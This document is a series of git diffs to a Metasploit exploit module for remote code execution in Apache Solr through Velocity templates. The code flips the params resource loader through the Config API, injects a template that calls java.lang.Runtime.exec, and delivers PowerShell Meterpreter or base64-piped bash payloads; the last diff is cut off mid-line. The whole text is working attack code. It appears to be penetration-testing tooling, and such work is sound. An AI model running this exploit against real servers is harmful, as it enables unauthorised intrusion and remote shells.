       update_config = send_request_cgi({
                       'method'        => 'POST',
-                      'headers'       => @headers,
+                      'connection'    => 'Keep-Alive',
+                      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
                       'ctype'         => 'application/json;charset=utf-8',
                       'encode_params' => false,
-                      'uri'           => "/solr/#{@core_name}/config",
-                      'data'          => @enable_params_resource_loader
+                      'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
+                      'data'          => enable_params_resource_loader
         })
 
       unless update_config
@@ -327,7 +287,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
       # lazy check for PowerShell
-      psh_enum = execute_command("where powershell", {'core_name' => @core_name})
+      psh_enum = execute_command("where powershell", {'core_name' => @vuln_core[0]})
       # did it connect?
       unless psh_enum
         fail_with Failure::Unreachable, "Connection failed!"
@@ -335,7 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # no PowerShell found by automatic check?
       unless (/powershell/i) =~ psh_enum.body.to_s
         # manual check for PowerShell
-        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", {'core_name' => @core_name})
+        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", {'core_name' => @vuln_core[0]})
         # got a successful connection?
         unless psh_enum_second
           fail_with Failure::Unreachable, "Connection failed!"
@@ -357,7 +317,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # prepare to exploit...
-      execute_command(psh_cmd, {'core_name' => @core_name})
+      execute_command(psh_cmd, {'core_name' => @vuln_core[0]})
     end
 
     # or unix-based?
@@ -367,41 +327,91 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
       end
 
+      # exploiting for Linux relies heavily on Bash, so go find it first
+      # lazy check for Bash
+      bash_enum = execute_command("which bash", {'core_name' => @vuln_core[0]})
+      # did it connect?
+      unless bash_enum
+        fail_with Failure::Unreachable, "Connection failed!"
+      end
+      # no Bash found by automatic check?
+      unless (/bash/i) =~ bash_enum.body.to_s
+        # manual check for Bash
+        bash_enum_second = execute_command("ls /bin/bash", {'core_name' => @vuln_core[0]})
+        # got a successful connection?
+        unless bash_enum_second
+          fail_with Failure::Unreachable, "Connection failed!"
+        end
+        # no Bash found by manual check?
+        unless (/bash/i) =~ bash_enum_second.body.to_s
+          # abort the exploit if Bash was not found
+          # TODO: CmdStager?
+          fail_with Failure::NoTarget, "Bash not found, aborting exploit attempt!"
+        end
+      end
+
       # base64 payload has to be URI encoded
       b64_payload = Rex::Text.encode_base64(generate_payload().raw)
       # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
       bash_cmd = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
       # prepare to exploit...
-      execute_command(bash_cmd, {'core_name' => @core_name})
+      execute_command(bash_cmd, {'core_name' => @vuln_core[0]})
     end
   end
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
-    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
+    # custom template which enables command execution
+    #template = <<-EOF
+    #  #set($x="")
+    #  #set($rt=$x.class.forName("java.lang.Runtime"))
+    #  #set($chr=$x.class.forName("java.lang.Character"))
+    #  #set($str=$x.class.forName("java.lang.String"))
+    #  #set($ex=$rt.getRuntime().exec("#{cmd}"))
+    #  $ex.waitFor() #set($out=$ex.getInputStream())
+    #  #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+    #EOF
     template = ('#set($x="") ' \
-    '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
-    '#set($chr=$x.class.forName("java.lang.Character")) ' \
-    '#set($str=$x.class.forName("java.lang.String")) ' \
-    '#set($ex=$rt.getRuntime().exec("' + cmd +'")) ' \
-    '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
-    '#foreach($i in [1..$out.available()])' \
-      '$str.valueOf($chr.toChars($out.read()))' \
-    '#end')
-
-    print_status(target_uri.path)
+      '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
+      '#set($chr=$x.class.forName("java.lang.Character")) ' \
+      '#set($str=$x.class.forName("java.lang.String")) ' \
+      "#set($ex=$rt.getRuntime().exec('#{cmd}')) " \
+      '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
+      '#foreach($i in [1..$out.available()])' \
+        '$str.valueOf($chr.toChars($out.read()))' \
+      '#end')
 
     # execute the exploit...
-    send_request_cgi({
-         'method'        => 'GET',
-         'uri'           => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
-         'headers'       => @headers,
-         'vars_get'      => {
-             'q'                 => '1',
-             'wt'                => 'velocity',
-             'v.template'        => 'custom',
-             'v.template.custom' => template
-         }
+    solr_get({
+        'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
+        'auth' => @auth_string,
+        'vars_get' =>  {
+            'q'                 => '1',
+            'wt'                => 'velocity',
+            'v.template'        => 'custom',
+            'v.template.custom' => template
+        }
       })
+  end
+
+  # make sending requests easier
+  def solr_get(opts = {})
+    send_request_cgi_opts = {
+        'method'        => 'GET',
+        'connection'    => 'Keep-Alive',
+        'uri'           => opts['uri']
+    }
+
+    # @auth_string defaults to "", meaning no authentication is necessary
+    if opts['auth'] != ""
+      send_request_cgi_opts.store('authorization', opts['auth'])
+    end
+
+    # a bit unrefined, but should suffice in this case
+    if opts['vars_get']
+      send_request_cgi_opts.store('vars_get', opts['vars_get'])
+    end
+
+    send_request_cgi(send_request_cgi_opts)
   end
 end

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
               [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
               [ 'URL', 'https://github.com/jas502n/solr_rce'],
               [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
-            #[ 'CVE', 'CVE-1111-2222'],
             ],
         'Platform'       => ['unix', 'win'],
         'Targets'        =>
@@ -70,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
               ]
             ],
         'DisclosureDate' => "Oct 29 2019",
-        'DefaultOptions' => { 'TARGET'  => 1 },
+        'DefaultTarget'  => 0,
         'Privileged'     => false
       )
     )
@@ -78,18 +77,15 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8983),
-        OptString.new('USERNAME', [false, 'Solr username (default is solr)', 'solr']),
-        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
+        OptString.new('USERNAME', [false, 'Solr username', 'solr']),
+        OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks'])
       ]
     )
-    deregister_options('URIPATH')
-    deregister_options('SRVHOST')
-    deregister_options('SRVPORT')
   end
 
   # are we just checking? or are we exploiting?
   @vuln_check = true
-  # if we are just checking, we only need one core to be exploitable
+  # if we are going to exploit, we only need one core to be exploitable
   @core_name = ""
   # OS specific stuff
   @target_platform = ""
@@ -110,20 +106,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # successfully connected?
     unless auth_check
-      return CheckCode::Unknown('Connection failed!')
+      return CheckCode::Unknown("Connection failed!")
     end
-
     # if return code is not 200, then the Solr instance definitely requires authentication
     unless auth_check.code == 200
       print_warning("Authentication required for #{peer}!")
       vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
       # no creds provided means we cannot reliably check exploitability
       if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
-        print_error("Credentials not provided, skipping credentialed check...")
-        return CheckCode::Unknown
+        return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
       # otherwise, attempt authentication
       else
-
         print_status("Attempting authentication for #{peer}...")
         attempt_auth = send_request_cgi({
                        'method'  => 'GET',
@@ -134,9 +127,13 @@ class MetasploitModule < Msf::Exploit::Remote
                        'uri'     => '/solr/'
           })
 
+        # successfully connected?
+        unless attempt_auth
+          return CheckCode::Unknown("Connection failed!")
+        end
+        # if the return code is not 200, then authentication definitely failed
         unless attempt_auth.code == 200
-          print_status("Authentication failed!")
-          return CheckCode::Unknown
+          return CheckCode::Unknown('Authentication failed!')
         end
 
         print_good("Authentication succeeded!")
@@ -166,8 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # can't connect? that's an automatic failure
     unless ver
-      vprint_error("Connection failed!!")
-      return CheckCode::Unknown
+      return CheckCode::Unknown("Connection failed!")
     end
 
     # convert to JSON
@@ -189,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # the vulnerability is only present in Solr versions <= 8.3.0
     unless @solr_version <= Gem::Version.new('8.3.0')
-      return CheckCode::Safe
+      return CheckCode::Safe("Running version of Solr is not vulnerable!")
     end
 
     # enumerate cores
@@ -202,13 +198,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # can't connect? that's yet another automatic failure
     unless cores
-      vprint_error("Could not enumerate cores!")
-      return CheckCode::Unknown
+      return CheckCode::Unknown("Could not enumerate cores!")
     end
 
     # convert to JSON yet again
     cores_json = cores.get_json_document
+    # draw up an array of all the cores
     @cores_list = Array.new()
+    # if we are checking, we better have an array of all the exploitable cores
+    @possibly_vulnerable_cores = Array.new()
     # get the core names
     cores_json['status'].keys.each do |core_name|
       @cores_list.push(core_name)
@@ -216,12 +214,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # no cores? that means nothing to exploit.
     if @cores_list.length == 0
-      print_error("No cores found, nothing to exploit!")
-      return CheckCode::Safe
+      return CheckCode::Safe("No cores found, nothing to exploit!")
     end
 
     # got cores? tell the operator which cores were found
-    print_good("Found core(s): #{@cores_list.join(", ")}")
+    print_status("Found core(s): #{@cores_list.join(", ")}")
     # for each core, attempt to get the config as JSON
     @cores_list.each do |core_name|
       core_config = send_request_cgi({
@@ -232,7 +229,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # can't retrieve configuration for that core? go next
       unless core_config
-        vprint_error("Could not retrieve configuration for core #{core_name}!")
+        print_error("Could not retrieve configuration for core #{core_name}!")
         next
       end
 
@@ -240,29 +237,40 @@ class MetasploitModule < Msf::Exploit::Remote
       core_config_json = core_config.get_json_document
       # if the core configuration does not include the Velocity Response Writer, go check the next core
       unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
-        vprint_error("Velocity Response Writer not found in core #{core_name}")
+        print_error("Velocity Response Writer not found in core #{core_name}")
         next
+      else
+        print_good("Found Velocity Response Writer in use by core #{core_name}")
+        @possibly_vulnerable_cores.push(core_name)
       end
-      vprint_good("Found Velocity Response Writer in use by core #{core_name}")
 
       # if params.resource.loader.enabled is false, we need to set it to true before exploitation
       if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
         print_good("params.resource.loader.enabled for core '#{core_name}' is set to true.")
         @params_resource_loader_enabled = true
       else
-        vprint_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
+        print_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
       end
 
-      # if we are preparing to exploit, the first core that fits the criteria is selected.
-      # whether or not the core has params.resource.loader.enabled is not a factor
-      # as it can be modified during the exploit
+      # if we exploiting, the first core that fits the criteria is selected.
+      # whether or not the core has params.resource.loader.enabled is not a factor as
+      # we can attempt to modify it during the exploit
       if @vuln_check == false
-        @core_name = core_name
-        return CheckCode::Vulnerable
+        unless @possibly_vulnerable_cores == nil
+          @core_name = @possibly_vulnerable_cores[0]
+          return CheckCode::Vulnerable
+        else
+          return CheckCode::Safe
+        end
       end
     end
 
-    return CheckCode::Vulnerable
+    # for checking, look at the array of vulnerable cores
+    if @possibly_vulnerable_cores == nil
+      return CheckCode::Safe "No cores are vulnerable!"
+    else
+      return CheckCode::Vulnerable
+    end
   end
 
   # the exploit method
@@ -270,7 +278,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # we are prepping to check and exploit, not prepping to check only
     @vuln_check = false
     unless [CheckCode::Vulnerable].include? check
-      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+      fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
     end
 
     # the new config in JSON format
@@ -298,12 +306,12 @@ class MetasploitModule < Msf::Exploit::Remote
         })
 
       unless update_config
-        fail_with Failure::Unreachable, 'Connection failed!'
+        fail_with Failure::Unreachable, "Connection failed!"
       end
 
       # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
       unless update_config.code == 200
-        fail_with Failure::UnexpectedReply, 'Unable to update config, exploit failed!'
+        fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
       end
 
       print_good("params.resource.loader.enabled is now set to true!")
@@ -313,58 +321,77 @@ class MetasploitModule < Msf::Exploit::Remote
     if @target_platform.include? "Windows"
       # if target is wrong, warn and exit before doing anything
       unless target.name.include? "Windows"
-        fail_with Failure::NoTarget, 'Target is found to be Windows, please select the proper target!'
+        fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
       end
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
-      # TODO: will CmdStager work if PowerShell not found?
+      # lazy check for PowerShell
       psh_enum = execute_command("where powershell", {'core_name' => @core_name})
-      # abort the exploit if PowerShell was not found
+      # did it connect?
+      unless psh_enum
+        fail_with Failure::Unreachable, "Connection failed!"
+      end
+      # no PowerShell found by automatic check?
       unless (/powershell/i) =~ psh_enum.body.to_s
-        fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
+        # manual check for PowerShell
+        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", {'core_name' => @core_name})
+        # got a successful connection?
+        unless psh_enum_second
+          fail_with Failure::Unreachable, "Connection failed!"
+        end
+        # no PowerShell found by manual check?
+        unless (/powershell/i) =~ psh_enum_second.body.to_s
+          # abort the exploit if PowerShell was not found
+          # TODO: CmdStager?
+          fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
+        end
       end
 
-      vprint_good("PowerShell found at #{psh_enum.body.to_s.split('0  ')[1].strip}")
+      print_good("PowerShell found, good to go!")
       # generate PowerShell command, encode with base64, and remove comspec
-      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      # manually specify PowerShell path
+      if psh_enum_second
+        psh_cmd.insert(0, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")
+      end
+
       # prepare to exploit...
-      execute_command(psh_command, {'core_name' => @core_name})
+      execute_command(psh_cmd, {'core_name' => @core_name})
     end
 
     # or unix-based?
     if @target_platform.include? "Linux"
       # if target is wrong, warn and exit before doing anything
       unless target.name.include? "Unix"
-        fail_with Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!'
+        fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
       end
 
       # base64 payload has to be URI encoded
       b64_payload = Rex::Text.encode_base64(generate_payload().raw)
       # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
-      bash_payload = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
+      bash_cmd = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
       # prepare to exploit...
-      execute_command(bash_payload, {'core_name' => @core_name})
+      execute_command(bash_cmd, {'core_name' => @core_name})
     end
   end
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
     # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
-    template = URI.encode('#set($x="")+' \
-    '#set($rt=$x.class.forName("java.lang.Runtime"))+' \
-    '#set($chr=$x.class.forName("java.lang.Character"))+' \
-    '#set($str=$x.class.forName("java.lang.String"))+' \
-    '#set($ex=$rt.getRuntime().exec("PAYLOAD_HERE"))+' \
-    '$ex.waitFor()+#set($out=$ex.getInputStream())+' \
-    '#foreach($i+in+[1..$out.available()])' \
+    template = ('#set($x="") ' \
+    '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
+    '#set($chr=$x.class.forName("java.lang.Character")) ' \
+    '#set($str=$x.class.forName("java.lang.String")) ' \
+    '#set($ex=$rt.getRuntime().exec("' + cmd +'")) ' \
+    '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
+    '#foreach($i in [1..$out.available()])' \
       '$str.valueOf($chr.toChars($out.read()))' \
-    '#end').gsub("PAYLOAD_HERE", Rex::Text.uri_encode(cmd))
+    '#end')
 
     # execute the exploit...
     send_request_cgi({
          'method'        => 'GET',
-         'encode_params' => false,
-         'uri'           => "/solr/#{opts['core_name']}/select",
+         'uri'           => normalize_uri(target_uri.path, '/solr/', opts['core_name'].to_s, 'select'),
          'headers'       => @headers,
          'vars_get'      => {
              'q'                 => '1',

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -8,7 +8,6 @@ require 'msf/core/exploit/powershell'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpClient
 
@@ -126,7 +125,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
       print_good("Authentication succeeded!")
       @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-      # TODO: add creds to MSF database
+
+      store_valid_credential(
+        user: datastore['USERNAME'],
+        private: datastore['PASSWORD'],
+        private_type: :password,
+        proof: attempt_auth.to_s
+      )
     end
 
     # send a GET request to get Solr and system details
@@ -252,9 +257,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }.to_json
 
-    # if params.resource.loader.enabled for that core is not true
+    # if params.resource.loader.enabled for that core is false
     if @vuln_core[1] != true
-      print_status("params.resource.loader.enabled is not true, setting it to true...")
+      print_status("params.resource.loader.enabled is false, setting it to true...")
       update_config = send_request_cgi(
         'method'        => 'POST',
         'connection'    => 'Keep-Alive',
@@ -291,18 +296,18 @@ class MetasploitModule < Msf::Exploit::Remote
       unless psh_enum
         fail_with Failure::Unreachable, "Connection failed!"
       end
-      # no PowerShell found by automatic check?
+
       unless /powershell/i =~ psh_enum.body.to_s
-        # manual check for PowerShell
+        # no PowerShell found by automatic check? do a manual check
         psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 'core_name' => @vuln_core[0])
         # got a successful connection?
         unless psh_enum_second
           fail_with Failure::Unreachable, "Connection failed!"
         end
         # no PowerShell found by manual check?
-        unless /powershell/i =~ psh_enum_second.body.to_s
+        unless /powershell.exe/i =~ psh_enum_second.body.to_s
           # abort the exploit if PowerShell was not found
-          # TODO: CmdStager?
+          # unfortunately, CmdStager doesn't work, as the CmdStager chunks are being written twice to the temp file
           fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
         end
       end
@@ -333,6 +338,7 @@ class MetasploitModule < Msf::Exploit::Remote
       unless bash_enum
         fail_with Failure::Unreachable, "Connection failed!"
       end
+
       # no Bash found by automatic check?
       unless /bash/i =~ bash_enum.body.to_s
         # manual check for Bash
@@ -341,18 +347,17 @@ class MetasploitModule < Msf::Exploit::Remote
         unless bash_enum_second
           fail_with Failure::Unreachable, "Connection failed!"
         end
+
         # no Bash found by manual check?
         unless /bash/i =~ bash_enum_second.body.to_s
-          # abort the exploit if Bash was not found
-          # TODO: CmdStager?
           fail_with Failure::NoTarget, "Bash not found, aborting exploit attempt!"
         end
       end
 
-      # base64 payload has to be URI encoded
-      b64_payload = Rex::Text.encode_base64(payload.encoded)
-      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
-      bash_cmd = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
+      print_good("Bash found, good to go!")
+      # base64 payload. let the send_request_cgi from execute_command do the encoding
+      # works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
+      bash_cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|{bash,-i}"
       # prepare to exploit...
       execute_command(bash_cmd, 'core_name' => @vuln_core[0])
     end
@@ -361,24 +366,15 @@ class MetasploitModule < Msf::Exploit::Remote
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
     # custom template which enables command execution
-    # template = <<-EOF
-    #  #set($x="")
-    #  #set($rt=$x.class.forName("java.lang.Runtime"))
-    #  #set($chr=$x.class.forName("java.lang.Character"))
-    #  #set($str=$x.class.forName("java.lang.String"))
-    #  #set($ex=$rt.getRuntime().exec("#{cmd}"))
-    #  $ex.waitFor() #set($out=$ex.getInputStream())
-    #  #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
-    # EOF
-    template = '#set($x="") ' \
-      '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
-      '#set($chr=$x.class.forName("java.lang.Character")) ' \
-      '#set($str=$x.class.forName("java.lang.String")) ' \
-      "#set($ex=$rt.getRuntime().exec('#{cmd}')) " \
-      '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
-      '#foreach($i in [1..$out.available()])' \
-        '$str.valueOf($chr.toChars($out.read()))' \
-      '#end'
+    template = <<-VELOCITY
+      #set($x="")
+      #set($rt=$x.class.forName("java.lang.Runtime"))
+      #set($chr=$x.class.forName("java.lang.Character"))
+      #set($str=$x.class.forName("java.lang.String"))
+      #set($ex=$rt.getRuntime().exec("#{cmd}"))
+      $ex.waitFor() #set($out=$ex.getInputStream())
+      #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+    VELOCITY
 
     # execute the exploit...
     solr_get(

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
         'Description'    => %q(
-          This module exploits a vulnerability in Apache Solr <= 8.3.1 which allows remote code execution via a custom
+          This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
           Velocity template. Currently, this module only supports Solr basic authentication.
 
           From the Tenable advisory:
@@ -27,8 +27,6 @@ class MetasploitModule < Msf::Exploit::Remote
           HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
           Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
           template parameter in a specially crafted Solr request, leading to RCE.
-
-          Payload defaults to x86 Meterpreter reverse TCP for Windows and Bash reverse TCP shell for Linux.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -76,7 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
                   'Platform'        => 'win',
                   'Arch'            => [ARCH_X86, ARCH_X64],
                   'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
-                  # TODO: find more cmdstager flavors for windows
                   'CmdStagerFlavor' => %w[vbs certutil]
                 }
               ],
@@ -104,40 +101,38 @@ class MetasploitModule < Msf::Exploit::Remote
   # if authentication is used
   @auth_string = ""
 
-  # check for vulnerability existence
-  def check
+  def check_auth
     # see if authentication is required for the specified Solr instance
-    auth_check = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => @auth_string)
+    auth_check = solr_get('uri' => normalize_uri(target_uri.path))
 
     # successfully connected?
     unless auth_check
-      return CheckCode::Unknown("Connection failed!")
+      print_bad("Connection failed!")
+      return nil
     end
 
-    # if return code is not 200, then the Solr instance definitely requires authentication
+    # if response code is not 200, then the Solr instance definitely requires authentication
     unless auth_check.code == 200
-      print_warning("Authentication required for #{peer}!")
-      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
       # if authentication is required and creds are not provided, we cannot reliably check exploitability
       if datastore['USERNAME'] == "" && datastore['PASSWORD'] == ""
-        return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
+        print_bad("Credentials not provided, skipping credentialed check...")
+        return nil
       end
 
       # otherwise, try the given creds
-      print_status("Attempting authentication for #{peer}...")
-      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
+      auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
 
       # successfully connected?
       unless attempt_auth
-        return CheckCode::Unknown("Connection failed!")
+        print_bad("Connection failed!")
+        return nil
       end
       # if the return code is not 200, then authentication definitely failed
       unless attempt_auth.code == 200
-        return CheckCode::Unknown("Authentication failed!")
+        print_bad("Invalid credentials!")
+        return nil
       end
-
-      print_good("Authentication succeeded!")
-      @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
 
       store_valid_credential(
         user: datastore['USERNAME'],
@@ -145,6 +140,18 @@ class MetasploitModule < Msf::Exploit::Remote
         private_type: :password,
         proof: attempt_auth.to_s
       )
+
+      @auth_string = auth_string
+    end
+    # a placeholder return value. Not requiring auth should throw no errors
+    ""
+  end
+
+  # check for vulnerability existence
+  def check
+    auth_res = check_auth
+    unless auth_res
+      return CheckCode::Unknown("Authentication failed!")
     end
 
     # send a GET request to get Solr and system details
@@ -233,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # look at the array of possibly vulnerable cores
     if possibly_vulnerable_cores.empty?
-      return CheckCode::Safe "No cores are vulnerable!"
+      CheckCode::Safe("No cores are vulnerable!")
     else
       # if possible, pick a core that already has params.resource.loader.enabled set to true
       possibly_vulnerable_cores.each do |core|
@@ -246,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if @vuln_core.to_s == ""
         @vuln_core = possibly_vulnerable_cores.first
       end
-      return CheckCode::Vulnerable
+      CheckCode::Vulnerable
     end
   end
 
@@ -258,30 +265,35 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Targeting core '#{@vuln_core[0]}'")
 
-    # the new config in JSON format
-    enable_params_resource_loader = {
-      "update-queryresponsewriter": {
-        "startup": "lazy",
-        "name": "velocity",
-        "class": "solr.VelocityResponseWriter",
-        "template.base.dir": "",
-        "solr.resource.loader.enabled": "true",
-        "params.resource.loader.enabled": "true"
-      }
-    }.to_json
-
     # if params.resource.loader.enabled for that core is false
     if @vuln_core[1] != true
-      print_status("params.resource.loader.enabled is false, setting it to true...")
-      update_config = send_request_cgi(
+      # the new config in JSON format
+      enable_params_resource_loader = {
+        "update-queryresponsewriter": {
+          "startup": "lazy",
+          "name": "velocity",
+          "class": "solr.VelocityResponseWriter",
+          "template.base.dir": "",
+          "solr.resource.loader.enabled": "true",
+          "params.resource.loader.enabled": "true"
+        }
+      }.to_json
+
+      opts_post = {
         'method'        => 'POST',
         'connection'    => 'Keep-Alive',
-        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'ctype'         => 'application/json;charset=utf-8',
         'encode_params' => false,
         'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
         'data'          => enable_params_resource_loader
-      )
+      }
+
+      unless @auth_string == ""
+        opts_post.store('authorization', @auth_string)
+      end
+
+      print_status("params.resource.loader.enabled is false, setting it to true...")
+      update_config = send_request_cgi(opts_post)
 
       unless update_config
         fail_with Failure::Unreachable, "Connection failed!"
@@ -302,8 +314,16 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
       end
 
+      # plain old exec
+      if datastore['PAYLOAD'].include?("windows/exec") || datastore['PAYLOAD'].include?("windows/x64/exec")
+        cmd = "C:\\Windows\\System32\\cmd.exe /c #{datastore['CMD']}"
+        exec_and_output(cmd)
+        # the exploit should end here if payload is windows/exec
+        return nil
+      end
+
       # exploiting for Windows relies heavily on PowerShell, so go find it first
-      winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'core_name' => @vuln_core[0], 'winenv_check' => true)
+      winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
       # did it connect?
       unless winenv_path
         fail_with Failure::Unreachable, "Connection failed!"
@@ -315,8 +335,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # is PowerShell in PATH?
-      # winenv_path.body = ""
-      print_status(winenv_path.body.to_s)
       if /powershell/i =~ winenv_path.body.to_s
         # only interested in the contents of PATH. Everything before it is irrelevant
         paths = winenv_path.body.split('=')[1]
@@ -333,29 +351,62 @@ class MetasploitModule < Msf::Exploit::Remote
           # specify full path to PowerShell
           psh_cmd.insert(0, path_val)
           # exploit the thing
-          execute_command(psh_cmd, 'core_name' => @vuln_core[0])
+          execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
         end
-      # no PowerShell? revert to CmdStager
+        # no PowerShell? revert to CmdStager
       else
         print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
         print_status("Sending CmdStager payload...")
-        # Execute the CmdStager
-        # TODO: determine max length
-        execute_cmdstager(linemax: 1500, 'core_name' => @vuln_core[0])
+        execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
       end
     end
 
     # or unix-based?
     if @target_platform.include? "Linux"
       if target.name.include? "Unix"
-        # lifted from https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
-        cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
-        execute_command(cmd, 'core_name' => @vuln_core[0])
+        if datastore['PAYLOAD'] == "cmd/unix/generic"
